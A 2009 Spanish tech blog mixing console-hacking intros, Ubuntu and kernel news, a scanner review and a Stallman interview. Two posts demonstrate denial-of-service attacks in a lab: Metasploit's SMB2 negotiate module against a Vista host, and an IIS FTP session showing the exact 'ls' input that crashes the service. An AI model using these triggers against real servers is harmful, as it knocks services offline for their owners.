Buscar dentro de este blog

jueves, 17 de diciembre de 2009

Wii Hacking - Episodio 0


Desde hoy voy a empezar con una serie de capítulos sobre el hacking en wii. Vamos a hablar de los "que" de los "porque" y mas específicamente de los "como".

En este primer "episodio" vamos a hablar de cosas generales, de los "que" de el hacking de consolas. Que es la Wii, que es homebrew y que es scene. La idea es empezar con la Wii y seguir con PSP, XBOX360 y (cuando sea una realizad) PS3.


¿Scene? ¿WTF?

Hoy en día entendemos a la “scene”, como la posibilidad de utilizar las videoconsolas para más cosas de las que han sido ideadas. A grandes rasgos, una consola es equivalente a una computadora, pero el fabricante impone una serie de limitaciones para que el usuario sólo pueda hacer con ella lo que el fabricante quiera. Sin embargo, nosotros como usuarios tenemos una serie de derechos, y como propietarios podemos hacer con nuestra máquina lo que queramos, siempre y cuando respetemos la ley.

El porque de que los fabricantes impongan estas limitaciones se debe a que, teóricamente, pierden dinero con cada consola que venden, y donde realmente tienen el negocio es en la venta de juegos, con los que se llevan una comisión en forma de licencia. Evidentemente, si los usuarios utilizan las consolas para otras cosas en vez de comprar juegos no están haciendo negocio.

Principalmente, son tres las limitaciones que impone el fabricante, las cuales podemos saltarnos bien con una modificación del hardware o del software, bien con algún accesorio no licenciado que venden terceras empresas:

* El uso de copias

* El uso de juegos de importación

* El uso de software casero


¿Homebrew? ¿Que es eso?

El significado estricto de homebrew es “hecho en casa, artesanal”. La aplicación de este término al mundo de la scene de videoconsolas se refiere al hecho de crear o ejecutar programas no oficiales, realizados por programadores no profesionales que no utilizan los métodos de desarrollo oficiales.

A veces el homebrew está permitido e incluso promovido (como puede ser el caso de PlayStation 3, y en parte Xbox 360), mientras que en otros casos la compañía fabricante hace todo lo posible por evitarlo (como con PSP) o depende completamente de él (como con la GP2X).



¿Que se Wii y con que se come?

Wii es la quinta consola de sobremesa de la compañía nipona Nintendo, sucesora de la GameCube. La consola fue conocida hasta antes del E3 del 2006 como Revolution, siendo una actualización hardware de su antecesora.

El sello distintivo de esta máquina es sin duda su mando inalámbrico, el Wiimote, el cual detecta tanto movimiento como rotación en tres dimensiones, además de tener función de puntero gracias a la barra sensora para colocar encima o debajo del televisor.
La Scene de Wii apareció muy pronto tras la salida de la consola. Aproximadamente, 2 meses después del lanzamiento de esta en Europa ya se disponía de modchips que permiten cargar backups y Homebrew de GameCube (que ya estaba explorado desde la Gamecube). Hoy en día ya es posible cargar aplicaciones que usen el mando Wiimote, cargar backups de la propia región y de otras, añadir canales no homologados al menú de Wii y mucho mas. Todo esto es posible básicamente porque:

* Existen chips que permiten cargar backups y homebrew.

* La Wii carga aplicaciones caseras de GameCube.

* Mediante el Twilight hack es posible la carga de homebrew nativo.

* La aplicación Trucha Signer que permite la edición y reempaquetado de software licenciado.


Proximo Capitulo: Corriendo Homebrew en una Wii (Juegos y otros...)

miércoles, 16 de diciembre de 2009

Los softs más vulnerables del 2009

La revista Forbes presentó los programas que sufrieron más ataques informáticos en 2009.

1. Adobe Acrobat Reader
2. Internet Explorer
3. Mozilla Firefox
4. Flash
5. Quicktime
6. Microsoft Office
7. Window$

 
Adobe Reader fue el blanco más vulnerable, dejando a Internet Explorer y Firefox en segundo y tercer lugar, respectivamente.


El Adobe Acrobat Reader fue víctima de errores explotables, que alcanzaron alrededor de 45 amenazas a lo largo del año. Un aumento considerable respecto de las 14 identificadas en 2008.

Según Forbes, el programa es un foco interesante porque casi todos los usuarios lo tienen instalado en su PC, su código fuente base es muy complejo y tiene el suficiente acceso a la computadora del usuario para dar a los crackers una buena puerta de ingreso. Ante esta situación, la compañía lanzó en mayo una serie de parches que casi le hizo detener el desarrollo del producto y concentrarse en la reparación de las fallas.

Además de la vulnerabilidad de Adobe Reader, la revista ubicó en el segundo puesto del ranking a Internet Explorer de Microsoft, que contabilizó 30 agujeros de seguridad, la misma cantidad detectada en 2008 pero inferior a los 49 de 2007.

Los navegadores no tuvieron suerte este año. Ante el crecimiento que experimentó el Mozilla Firefox, que ocupa el 25% del market share, los creadores de malware lo vieron como otro blanco atractivo. Los analistas encontraron 102 bugs.

El cuarto lugar fue para otra aplicación de Adobe. En esta ocasión, a la tecnología Flash se le detectaron 11 vulnerabilidades. El año anterior tuvo 19. Seguido, Quicktime, software propiedad de Apple, se vio afectado por 26 errores.

La lista de Forbes continúa con el Microsoft Office, al que se le detectaron 41 errores con posibilidad de ser explotados. 


En último lugar, el Window$....

Vale la pena destacar que estos software vulnerables son los explotados últimamente por los atacantes para ownear redes empresariales (son los ataques conocidos como "Client Side Attacks")...

lunes, 14 de diciembre de 2009

Publicado (y parcheado) el primer exploit de PSP Go


Esta bien... ya se... es una noticia vieja pero igual quiero comentarlo. Hace algo asi como 18 dias atras se publico el ultimo firmware para PSP Go. Entre las novedades no mencionadas en esta última actualización (v6.20) para PSP estaba el parcheo de un importante fallo de seguridad. Este fallo se utilizo en su momento para desarrollar el primer exploit para PSP Go, el cual no llego a ser publicado y aun así Sony ha logrado identificarlo y bloquearlo.



Para poder sacar probecho de este fallo, es necesario el firmware anterior (el v6.10) y el juego Mercury, cuya versión disponible en la red PSN (PlayStation Network) ha sido también actualizada convenientemente para requerir el nuevo firmware (v6.20). Aun así aquellos usuarios que que cumplan los requisitos y quieran probar este exploit ya pueden hacerlo dado que Freeplay (el exploitwritter que lo desarrollo) ya lo ha publicado. Por razones obvias, no voy a publicar el link, pero creanme que no es dificil encontrarlo :).

A las claras esta que este nuevo modelo de negocio realmente se las trae. Si nos ponemos a pensar, los beneficios de utilizar una política de venta y descarga online es beneficiosa para todos.

El usuario final puede comprar su contenido legalmente. No tiene que modificar su consola y por lo tanto no pierde la garantia. Ademas, de poder aprobechar las ventajas que estan ofreciendo en este momento los vendors (demos, contenido exclusivo, avances de cine y juegos, y hasta peliculas completas!). Otra obvia ventaja es la eliminacion del soporte fisico, el cual muchas veces terminan por quedar archivados o simplemente descontinuados (Cartuchos de Snes/N64/Sega - UMDs, GDROM).

Respecto al vendor, esta visto que puede tener un control mas minucioso del contenido que esta vendiendo y puede reaccionar mas rapidamente ante una faya de seguridad criticas (sino, preguntenle a Nintendo y sus Twightlight Prices / Twightlight hack)


Les dejo un videito del exploit en funcionamiento :)...



video

Nexus One, el celular de Google

"El teléfono es ligeramente más delgado que el iPhone, utiliza como sistema operativo Android 2.1 y será fabricado por HTC..."

Google da el salto definitivo al mercado de la telefonía móvil con el lanzamiento del que será su primer celular: Nexus One

El primer teléfono de Google funcionará, por supuesto, con Android y, según The Wall Street Journal, se lanzará en la segunda semana de Enero de 2010.

HTC será la encargada de la fabricación de este terminal que, según apuntan los especialistas, tendrá un diseño parecido al HTC Dragon.Funciona sobre un chip Snapdragon, cuenta con una pantalla OLED de alta resolución y una rueda scroll, no incluye teclado físico y dispone de dos micrófonos, uno de ellos situado en la parte posterior para reducir el ruido.

Obviamente el sistema operativo que utiliza es Android 2.1. el cual posee más escritorios y la posibilidad, con un botón habilitado para ello, de ver en miniatura a los mismos. También veremos un aspecto más tridimensional en los elementos e iconos en pantalla y los ya comentados fondos de escritorio animados.

Se comenta que el reconocimiento de voz está mucho más integrado en todo el sistema...
Las informaciones apuntan también a que será libre, es decir, que se podrá utilizar con cualquier operadora.

Actualmente el Nexus One por ahora sólo está disponible para sus empleados, quienes lo están probando para colaborar en desarrollo y mejora del mismo...

El Nexus One tiene unas líneas muy interesantes, destacando su delgadez y la disminución en el número de botones físicos por una superficie sensible al tacto.

jueves, 3 de diciembre de 2009

Avast! enloqueció

Los usuarios del antivirus Avast! vieron como el mismo enloqueció luego de que instaló la actualización VPS 091203-0 del día de hoy a las 12:15 AM.
Esta actualización provocaba que el AV detectara varios archivos infectados en programas legítimos como por ejemplo: “TuneUp Utilities”, “SpyBot S&D”, “Deep Freeze”, “Ares”, “Skype” y un largo etc. de programas detectados erróneamente por Avast como el Troyano Win32:Delf-MZG y aparte generaba un problema en el Boot de Windows si este era reiniciado.

Cabe aclarar que Avast! ya publicó la actualización urgente VPS 91203-1 la cual ya corrige estos “Falsos Positivos” detectados por Avast, pero no repara los errores que hayan podido quedar en el sistema por el haber borrado algún archivo legitimo.

Hasta ahora no hay ningún comunicado oficial de parte de la gente de Avast sobre lo sucedido...

Solución real al problema ... usar Linux :P

jueves, 5 de noviembre de 2009

Pergolini usa Ubuntu :)

Mario Pergolini en su programa "Cual Es?" de la Rock & Pop, antes de ayer, estuvo hablando de que tiene instalado Ubuntu en su computadora...

Después de contar las maravillas de usar un sistema NO PRIVATIVO, dijo que pensaba utilizar solamente programas que sean Software Libre ;)

Para cerrar la charla dijo "desde que descubrí el Ubuntu soy un hombre feliz!" :)

Espero que esto además de haberme alegrado un poco la mañana el otro día (como a todo freaky - ubuntu user que escuchó eso en vivo) contribuya a que algunas PCs más sean liberadas de sistemas privativos...

viernes, 30 de octubre de 2009

Llegó el tan esperado Ubuntu 9.10!!!

Define: Ubuntu 9.10 ("Karmic Koala")

Un resumensito lo pueden encontrar ACA o en mi anterior post al respecto.

martes, 27 de octubre de 2009

Netsparker - Web pentesting

La gente de Mavituna Security, muy amablemente, me facilitó una copia de su nueva herramienta Netsparker v0.9.9.9935 (FINAL BETA).

La cual he mostrado en el curso oficial de CEH dictado la semana pasada :)

Define: Netsparker

Es una tool que permite hacer crawling e identificar/explotar vulnerabilidades web.
Al igual que otras herramientas del mismo estilo, Netsparker realiza XSS y SQL Injection asi como otras tecnicas utilizadas actualmente por atacantes reales...

Lo primero a destacar de dicha herramienta es su entorno gráfico (GUI), el cual es muy colorido, intuitivo y simple... permite scannear un sitio en muy pocos clicks :)

El GUI permite ver el progreso del scanneo, las vulnerabilidades encontradas y los paquetes enviados y recibidos...
Otra cosa a destacar, que es una debilidad en la mayoria de los scanners web pero no en éste, es el detalle de cómo realizar la remediación de cada vulnerabilidad detectada; así como también el detalle de las mismas.

Una vez finalizado el scanneo, Netsparker permite exportar los resultados en varios formatos como HTML y XML.

Por lo que pude probar parece ser un muy buen producto... rápido, amigable y flexible.

Vamos a tener que esperar el release final para poder disfrutar de algunos otros features adicionales ;)

Ubuntu 9.10 Karmic Koala

Según el calendario oficial, la version final de Ubuntu 9.10 se lanzará el 29 de octubre, cumpliendo con el compromiso de una versión estable cada seis meses...


0_ La carga de Ubuntu es más rápida y más vistosa

1_ Mejoras en WUBI. Wubi es el instalador de Ubuntu en Windows


2_ Pequeñas mejoras en el instalador (Ubiquity).
El propósito es crear una especie de slideshow, algo así como ocurre en openSuse, Mandriva, Windows XP, etc.


3_ GRUB2 por defecto


GRUB 2 viene a sustituir a la actual versión de este popular cargador de arranque, que no se actualiza con nuevas características desde hace años, y nos trae, entre otras, las siguientes novedades:
* Soporte de scripting (condicionales, bucles, variables, funciones, …)
* Interfaz gráfica
* Carga de módulos de forma dinámica
* Portabilidad para varias arquitecturas
* Internacionalización, incluyendo el uso de caracteres no ASCII
* Mejor gestión de la memoria
* Modo de rescate


4_ Ext4 por defecto

En algunas pruebas ext4 duplica y casi triplica los resultados de otros sistemas de ficheros como XFS, JFS, ReiserFS y ext3.

5_ Reemplazo de USplash por XSplash



6_ Se utiliza sreadahead para precargar datos que el sistema de arranque va a necesitar, y para almacenarlos en una caché de forma que estén disponibles para próximos arranques del sistema.

7_ Reemplazo de sysvinit por Upstart.

Si bien Upstar está presente en Ubuntu desde la versión 6.10, pero no se aprovechaba en todo su potencial hasta ahora, y permitirá mejorar la paralelización del proceso de arranque.

8_ El aspecto de la pantalla de login (GDM) se ha modificado, así como el fondo de pantalla, los iconos y el tema por defecto, Human, que ahora tiene un tono más oscuro.
El Ubuntu Desktop Team promete más y mejores cambios en próximas versiones.


9_ Nuevos fondos de pantalla y fondos que cambian automáticamente con el tiempo.

10_ Ubuntu Software Center

Es una nueva aplicación que sustituye a “Añadir/Quitar programas” y que en el futuro crecerá para sustituir a synaptic, gdebi y el gestor de actualizaciones.

11_ Software actualizado: Firefox 3.5, GNOME 2.28, kernel 2.6.31, …

12_ Nuevo cliente de mensajería, Empathy, que viene a sustituir a Pidgin e incluye funcionalidades tan interesantes como llamadas de audio, videoconferencia y compartir pantalla.

13_ Canonical ha desarrollado una nueva aplicación llamada Quickly que busca facilitar el desarrollo de software, la creación de paquetes deb o el trabajo con sistemas de control de versiones. Esta no viene instalada por defecto; si queréis probarla:

14_ Mejoras en Uncomplicated Firewall y en la seguridad y la velocidad de AppArmor, la aplicación de Novell para mejorar la seguridad del sistema operativo mediante Mandatory Access Control (MAC).

martes, 20 de octubre de 2009

Error en Ubuntu afecta la hora de Argentina


Los usuarios de ubuntu hemos notado que desde el 18 de Octubre nuestros sistemas "automaticamente adelantaron 1 hora sus relojes".

Esto se debe a que estaba planificado el cambio horario en Argentina pero pero el gobierno unos pocos días antes decidió no hacerlo. Pueden ver la noticia ACA

Más allá del tema político, los freakys nos vimos afectados por este "error" (por no llamarlo Bug) de Ubuntu.

Para solicionarlo, deben actualizar el sistema.... Eso va a actualizar el
tzdata.

martes, 13 de octubre de 2009

Cantidad récord de parches para Window$

A lo largo del día Microsoft emitió 13 parches para solucionar un total de 34 vulnerabilidades.

Los parches son para: Windows 7, Internet Explorer, Silverlight, Office y otros productos ;)

8 de los boletines fueron calificados como críticos y el resto son consideradas vulnerabilidades como muy importantes.

Este signo precoz de los problemas de seguridad en Windows 7 es potencialmente preocupante para Microsoft, que está esperando que su nuevo OS borre los malos sentimientos entre los muchos clientes que compraron su predecesor, Windows Vista.

Sniffear detras de las paredes

En Argentina, Motorola presentó los equipos "Xaver".. Xaver es un radar (de unos 15 Kg) que genera imágenes de lo que sucede del otro lado de una pared :)

Este dispositivo identifica seres vivos, los cuales aparecen nítidamente como imágenes en 3-D en la versión portátil y, en 2-D, en la versión normal del producto.

Información tal como el número de personas con vida, la ubicación física y eventuales cambios de posición (sentado, parado, etc.) pueden ser fácilmente identificados con el dispositivo, el cual también permite diferenciar la presencia de adultos, niños y animales, o bien detectar si una persona está inconciente.

Obviamente estos dispositivos son utilizables por fuerzas policiales y militares para operaciones de rescate de rehenes, asaltos, entradas con explosivos y capturas de alto riesgo...

video

jueves, 1 de octubre de 2009

Covertir (visualmente) a Ubuntu en Vi$ta


En 5 sencillos pasos podemos convertir visualemente a nuestro querido Ubuntu en algo muy similar a Window$ Vi$ta.


1- Bordes de ventanas

Bajar los siguientes bordes de ventanas:
http://www.gnome-look.org/content/download.php?content=41090&id=1
Descomprimir el archivo descargado.
Abrir Sistema–>preferencias–>tema y arrastrar los directorios a esa ventana para instalarlos.

3- Fondos

Bajarse los fondos de escritorio originales de Vista:
http://www.flickr.com/photos/brajeshwar/sets/72157594337336752/

4- Iconos

Bajar los iconos de:
http://www.gnome-look.org/content/download.php?content=56625&id=1
El procedimiento de instalación es el mismo que en el punto 2.

5- Punteros

apt-get install gcursor
Bajar: http://www.gnome-look.org/content/download.php?content=58853&id=1
Sistema-->preferencias-->seleccion del cursor, clickear en"instalar tema" y seleccionar el archivo descargado

lunes, 21 de septiembre de 2009

KDE4 es WIndow$ 7?

Voy a compartir un videito en el cual los chicos de ZDNet Australia hacen un curioso experimento...

¿Qué ocurriría si salieras a la calle con KDE 4 y dijeras a la gente que es Windows 7?



Muchos lo creerian! :)

miércoles, 16 de septiembre de 2009

Exploiting SMB2 DoS

Continuando con el post publicado ayer por la noche acerca del bug SMB2 Negotiate, ahora voy a mostrarles paso a paso como exploté la vulnerabilidad en un entorno de prueba ;)

1- Descargué el auxiliary smb2_negotiate_pidhigh.rb para Metasploit
2- Cargué el auxiliary
3- Ejecute el exploit contra la IP de prueba 10.1.1.50

4- Pude visualizar como el host victima (Window$ Vista SP2) mostraba una pantalla azul de la muerte y se reiniciaba:



video

5- Luego del reinicio a causa del exitoso DoS :) Vista mostró una pantalla de error detallando lo susedido


Happy Hacking ;)

martes, 15 de septiembre de 2009

SMB2.0 NEGOTIATE DoS


El 8 de Septiembre, el researcher Laurent Gaffié descubrió una nueva vulnerabilidad -CVE-2009-3103- en el SMB2 Negotiate de los sistemas: Windows Vista, Windows Server 2008 y Windows 7 RC.

Recordemos que apartir de Windows Vista los sistemas de Microsoft utilizan una nueva version de SMB llamada SMB2.

Si bien Microsoft publicó este Advisory, aún no publicaron un fix. Hace 1 hora atrás Microsoft dijo que se esta trabajando en un parche para solucionar esto cuanto antes.

Para los que no contamos con el Immunity Canvas, HD Moore ya publicó un exploit para
Metasploit. Para poder utilizarlo deben actualizar el metasploit, descargar el auxiliary "smb2_negotiate_pidhigh.rb" y copiarlo en el directorio correspondiente. Luego utilizarlo [msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh] .

Pueden ver el código fuente del exploit ACA Happy Hacking :)

TOP 5 del Kernel 2.6.31


1. Soporte USB 3.0

Una de las mejoras más notables es que GNU/Linux se convierte en el primer sistema operativo en soportar el nuevo estándar USB de alta velocidad, hasta 600 Mbytes/s de transferencia máxima teórica, que por
diseño del bus se quedan en unos eficientes 350 Megabytes por segundo,
10 veces más que con USB 2.0.

2. Mejor rendimiento del sistema de escritorio

Debido a recientes cambios en el kernel, el sistema es capaz de
gestionar mejor las páginas de memoria manteniendo en la RAM los
programas que uses en este momento y evitando la paginación en SWAP de
los mismos. Ello quiere decir que las aplicaciones funcionarán de
manera más fluida al no requerir lecturas y escrituras del disco duro.
Varias pruebas de rendimiento han mostrado una mejora del orden del 50% frente a la versión anterior de kernel.

3. Mejoras de rendimiento en los sistemas de archivos

Gracias al uso de ACL (Access Control List) se consiguen lecturas de alrededor de un 3% más rápidas (en sistemas Ext), que si bien no suena
muy convincente, a la hora de arrancar un programa, ese porcentaje de
mejora sumado al resto hace que el resultado final sí que sea
notable.
Hay casos como el de gente que utiliza Oracle con sistema de ficheros
Btrfs, que notará una mayor mejora. De alrededor de un 15%.

4. Mejor soporte gráfico

En esta versión del kernel se han integrado muchas novedades entre las
que destacan Kernel Video Mode que mejorará el soporte para gráficas
Intel y ATI Radeon, con peor soporte que NVIDIA.
Esos cambios realizados prometen mayor estabilidad y rendimiento
gráfico en sistemas con tarjetas gráficas de esas familias.

5. Mejor soporte de red

De la misma manera que sucede con el punto anterior, hay grandes
novedades respecto al soporte hardware. El principal en el terreno de
redes es que Linux integra soporte en el propio kernel para múltiples tarjetas de red inalámbricas, como la futura de Intel Wi-Fi 802.11
3200. De momento no integra soporte nativo de Wi-Fi N, recién aprobado
como estándar. Pero gracias al ritmo de trabajo de los desarrolladores
para cuando los nuevos equipos de red con certificación oficial
lleguen al mercado, el kernel ya habrá integrado el mismo.

Información enviada por Sepa desde su lista ArLinux

sábado, 12 de septiembre de 2009

MSN via SMS


Desde ayer, Micro$oft anunció la disponibilidad de un nuevo servicio en Argentina (solo para clientes de Personal) que te permite chatear con tus contactos de MSN mediante mensajes SMS.
En principio está pensado para los usuarios que posean teléfonos de poca tecnología, que no puedan correr ningún cliente compatible con la red del MSN.

El proceso de registro es muy simple, pero el uso es bastante engorroso y los SMS no tienen ningún costo adicional.



Para registrarse tienen que ingresar en el sitio SMS para Windows Live Messenger, ahí tienen que loguearse con su Live ID e ingresar el número de teléfono que van a asociar a la cuenta. El sistema les enviará un código de confirmación a través de SMS, y ustedes tendrán que ingresarlo para confirmar que efectivamente son propietarios de la línea.

Una vez confirmado todo, podremos mostrarnos como disponibles en el sistema enviando un SMS con el comando “ON” al número que nos indican, y para ocultarnos enviamos el comando “OFF”. El sistema siempre nos confirmará luego de cada comando enviado, podemos agregar contactos y chatear con ellos desde el teléfono, sin necesidad de que ellos usen este sietema, pueden hablarte desde su computadora usando el Windows Live Messenger tradicional.

lunes, 7 de septiembre de 2009

{Humor} Videos de Sysadmins Freakys

ALMUERZO DE UN FREAKY:



PING DE LA EX:



CONSULTA EN HELP DESK:



TEARAPIA DE FREAKYS:

viernes, 4 de septiembre de 2009

MS IIS FTPD DoS 0DAY :D

Nikolaos Rangos acaba de publicar un exploit para explotar una
vulnerabilidad de DoS del servicio IIS FTPD.

Este exploit simple puede ser explotado por cualquier usuario
(incluso los "anonymous") que se conecten a un FTP vulnerable,
siempre y cuando tengan acceso de lectura en un directorio...

A continuación voy a mostrar una manera de provocar un DoS
accediendo con un usuario anonimo que tiene permiso de lectura
en el directorio "pub":

ftp 192.168.2.102 -> ftp server vulnerable
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): anonymous -> usuario anonimo
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Remore Host has closed the connection. -> DoS exitoso :)

Este DoS se produce tras provocar un tipico "stack overflow"
(esto se puede corroborar debuggeando el servicio con el OllyDbg).

Lo mejor de todo es que este exploit afecta a las
versiones IIS 5.0 y 6.0
:D

miércoles, 2 de septiembre de 2009

WPA Cracking en menos de 60"

Hoy un researcher, de la Hiroshima University y Masakatu Morii of Kobe University, llamado Toshihiro Ohigashiha ha reportado un ataque que permite crackear WPA.

El ataque se basa en una vulnerabilidad conocida desde Noviembre 2008 pero que hasta hoy no tenia una explotación ;)

Los detalles de esta nueva tecnica serán expuestos en una conferencia técnica el 25 de Septiembre en Hiroshima. Pero se puede obtener más información sobre el ataque ACA

Stallman Censurado


La primeras palabras de Richard Stallman hacia el público marplatense que asistió al Teatro Diagonal fueron "UTN: Universidad Totalmente Necia".

Por qué dijo esto?

Porque la charla de Richard Stallman que estaba anunciada para realizarse en la facultad de la UTN Mar del Plata fue cancelada / censurada.

Los motivos argumentados fueron que la UTN tiene firmados varios acuerdos con Microsoft que imposibilitaban permitir una charla en la cual se criticase los productos, la metodología y la política de Microsoft...

En el sitio de la UTN simplemente se lee «Por motivos ajenos a esta Institución, nos vemos obligados a suspender la charla programada para el día Martes 1° de Septiembre de 2009.»

viernes, 28 de agosto de 2009

Entrevista completa a Richard Stallman

Fuente: http://www.lanacion.com.ar/1166398

Un pequeño cuarto de la radio La Tribu , lleno de viejos equipos receptores, es el ambiente en que Richard Stallman , denominado padre del movimiento del software libre por ser el impulsor de GNU-Linux y creador de la Free Software Foundation , mantiene la entrevista con lanacion.com en un templado mediodía porteño. Mientras enfría su té luego de contestar e-mails sin utilizar ningún tipo de interfaz gráfica, puro texto blanco sobre fondo negro, pide que se le hable despacio y muestra como ha mejorado su pronunciación del español.

Luego de aclarar que él habla de GNU-Linux (no sobre Linux como unidad, éste es sólo el núcleo del sistema completo que él impulsó);
de software privativo en lugar de propietario y de software libre (no código abierto, un concepto más cercano al mercado), RMS , como se lo conoce en todo el mundo, pide dudas puntuales mientras se define como un militante de la libertad y un disidente político: "Necesito preguntas específicas, porque si esta es de algo muy amplio pienso muchas cosas en paralelo y así mis respuestas no sirven", explica el desarrollador, ahora una suerte de filósofo seguido por miles de fieles que creen que hay vida más allá de las ventanas del sistema operativo líder del mercado.

Viene a Buenos Aires a participar de muchas charlas, entre ellas Wikimania , ¿Cuál es la relación entre Wikipedia y el software libre?

Podríamos decir que la relación se da en la década pasada cuando comencé a argumentar que las obras de uso práctico deben ser libres. Esa fue una de las inspiraciones para Wikipedia, pero ellos tienen muchas ideas que no vinieron de mí, como es el hecho de usar herramientas colaborativas del tipo wiki.

Hoy, 24 horas antes de que participe en Wikimania, Richard Stallman dará una charla en el Teatro Alvear , al mediodìa. La entrada es gratuita.

Volviendo a la actualidad de su movimiento, hace unas semanas Linus Torvalds, desarrollador de Linux, dijo que el odio a Microsoft es una enfermedad . ¿Cree que es así?

Siempre he dicho lo mismo, es un error enfocarse en Microsoft como el gran enemigo, eso lleva a pensar que si un desarrollo no es de Microsoft es aceptable, pero
el problema no es Microsoft, es el software privativo que no respeta la libertad del usuario, sea quien sea el desarrollador.

Entonces está de acuerdo con la afirmación de Torvalds.

Sí, pero hay que tener en claro que Torvalds utilizó esa afirmación como una excusa para atacar al movimiento del software libre, sugiriendo que nosotros sí odiamos específicamente a Microsoft. Algo que no es verdad.

¿Cuál es el origen de esta discusión?


Suele criticarnos.
Torvalds nunca apoyó nuestras ideas de libertad, publicó un programa importante libre, el núcleo Linux, kernel en la jerga, que llenó el ultimo hueco que faltaba en el sistema operativo GNU, que dio vida a GNU/Linux pero no lo hizo por su apreciación de la libertad.

No sé cuáles fueron sus motivos para liberar su kernel porque al comienzo no era libre, en 1991 no lo era, fue en 1992 cuando lo público otra vez de manera libre.


Richard Stallman en una de sus últimas exposiciones, esta vez en Calgary
Foto: Gentileza: Flickr/Cheetah100

Pese a eso ¿cuál es su opinión actual sobre Microsoft? ¿Ve cambios en el futuro Windows 7?


No,
Windows 7 tiene todas las cosas malévolas de Windows Vista, puede tener menos errores pero para mí los errores son algo secundario, para mí se trata de abusar del usuario.

Windows tiene tres tipos de funciones malévolas: envía mensajes diciendo lo que hace el usuario, restringe al usuario en cuanto a lo que puede hacer con la máquina y hace cambios sin pedir la aprobación del supuesto dueño de la máquina.

Y, en ese contexto, ¿qué opinión tiene de Google?

Google hace varias cosas y prefiero juzgar a cada cosa por separado, hay varios servicios los que no les veo ningún problema especifico, pero hay otros en los que los usuarios no se dan cuenta que están instalando software privativo, su navegador lo hace invisiblemente, no avisa que está descargando una aplicación privativa pero lo hacen. Esta aplicación se llama, en la jerga, JavaScript .

Es posible que todos los servicios de Google transmitan programas privativos pero algunos siguen funcionando sin necesidad de activarlos. El motor de búsqueda, por ejemplo, sigue funcionando sin JavaScript. Gmail usualmente se usa con una aplicación privativa con JavaScript, tiene otro sin Javascript pero no se usa mucho, está en la frontera, es apenas aceptable. Hay servicios como Google Docs que no funcionan en absoluto sin este tipo de complementos.

Quizás tiene alguna aplicación 100% limpia pero no conozco a todos. Sin embargo,
Google Earth exige la instalación explicita de un programa privativo, no está escondido y no se debe usar.

Y fuera de estas empresas, ¿ve esta actitud en otras firmas?

En varios, pero por su impacto cultural, a
lgo que vemos como muy grave es el Kindle, el libro electrónico de Amazon , que pese a que se presenta como una mejor manera de almacenar y leer textos lo que hace es imponer a cada usuario identificarse para conseguir un libro, hace vigilancia, gracias a que las copias son limitadas, y deja abierta la posibilidad de una intervención remota.

Amazon ordenó remotamente borrar todas las copias de un libro, y no pudo ser otro que "1984", la historia del gran hermano (se ríe). Qué irónico, es la actitud más irónica que existe. Luego Amazon prometió nunca más usarlo pero se quedó con el poder de hacerlo, no es aceptable que tenga ese poder. Ese producto es un producto malévolo.

¿Qué cree que hacen estas empresas con esa información?

No lo sé y no me importa porque no tienen derecho a saber lo que hago,
ningún desarrollador debe tener el poder sobre el programa que usa un tercero, el control lo debe tener el usuario. No sólo crítico a Microsoft, ellos son uno sólo de los desarrolladores de software privativo con funciones malévolas, cualquier programa privativo es injusto.

No buscó excusas para convencerme de que este tipo de software o hardware no me hacen daño, no me interesa porque lo importante es que limita la práctica de prestar libros,
los libros electrónicos como el Kindle tienen el propósito de quitarnos las libertades tradicionales como lectores. No se puede pedir el libro a un amigo, pedirlo en una biblioteca, vender el libro a una tienda de segunda mano, comprar el libro en efectivo sin que nadie sepa quién soy, o guardar el libro todo el tiempo que uno quiera para que sea heredado por nuestros hijos. Todo esto apunta a que paguemos una y otra vez.

Lo que dice se enfrenta a la idea de que el mundo digital promueve la democratización del acceso contenido.

Sí, las empresas cuyo interés es el control de la información siempre buscan maneras de tener más poder, este es uno de los modos. Hay que pelear contra eso, no hay relación directa entre el mundo digital y la democracia, hay que hacerla.

En los últimos años creció mucho la presencia de las redes sociales en Internet, como Facebook y Twitter, ¿que opinión tiene sobre ellas?

No me gustan como son. No las probé porque no tengo tiempo para tales cosas Pero la idea de la red social como concepto no me parece mala en sí misma, el problema es que
la mayoría de estos servicios presentan una imagen falsa de privacidad y deberían actuar honestamente.

Deberían advertir al usuario del peligro de que cada cosa que diga en el sitio llegue a ser pública porque esto es muy posible. Lo que hacen es sugerir que si prefieres podes mostrar la información sólo a los amigos pero no te dejan en claro que ellos le pueden comentar a los demás y así llegan al gran público.

Pero hay usuarios que deciden deliberadamente contarle al mundo lo que hacen.

No estoy en contra, yo también le digo muchas cosas al mundo. Defiendo la privacidad no por mis propios secretos sino por los secretos suyos y de todo el mundo.
Los disidentes necesitan mantener secretos, si están planeando un secreto y la policía se entera de todo, la policía suele defender a las empresas y romper las leyes para atacar a la democracia, hay razones validas para mantener secretos en la política.

Firefox nace de la comunidad y se puede decir que es exitoso, ¿es un ejemplo para usted?

Firefox hoy en día es software libre pero sugiere plugins privativos, nosotros ofrecemos Icecat , un browser que no sugiere software privativo y es muy importante, un programa privativo no es ético. Sugerir su uso como si fuese una solución es afirmar que no es un problema.

Muchas personas lo siguen y le prestan atención a lo que dice. ¿Qué tecnología usa?

Uso una notebook Lemote porque funciona con software libre y no hay manera de que pueda correr Windows. Tiene interfaz grafica pero no la uso mucho, yo trabajo con mi máquina como un terminal de texto en general. También tiene X y Gnome , los uso a veces. Como navegador uso Epiphany .

¿Escucha música en la notebook?

A veces, es complicado. Usualmente llevo música en mis viajes copiando mis discos como discos audio porque así pueden reproducirse en cualquier reproductor de CDs. Pero cuando comprimo música como cuando tengo muchos discos grandes y la copio en la computadora uso el formato OGG Vorbis, con 0gg123 porque no me gustan las interfaces graficas, son muy lentas, no me gusta esperar.

Pero, ¿entiende que mucha gente sí necesite una interfaz gráfica?

Sí, no estoy en contra. Hemos hecho mucho esfuerzo para desarrollar interfaces gráficas libres, quiero que el software libre sea cómodo para todos los usuarios. Esto es más rápido para mí.

Ubuntu es una distribución de GNU Linux que ha ganado tracción, ¿es un modelo posible?


H
ay cientos de distribuciones GNU/Linux pero no son libres porque contienen programas privativos, eso es muy triste.

¿No es este un software clave para llegar gran cantidad de usuarios?


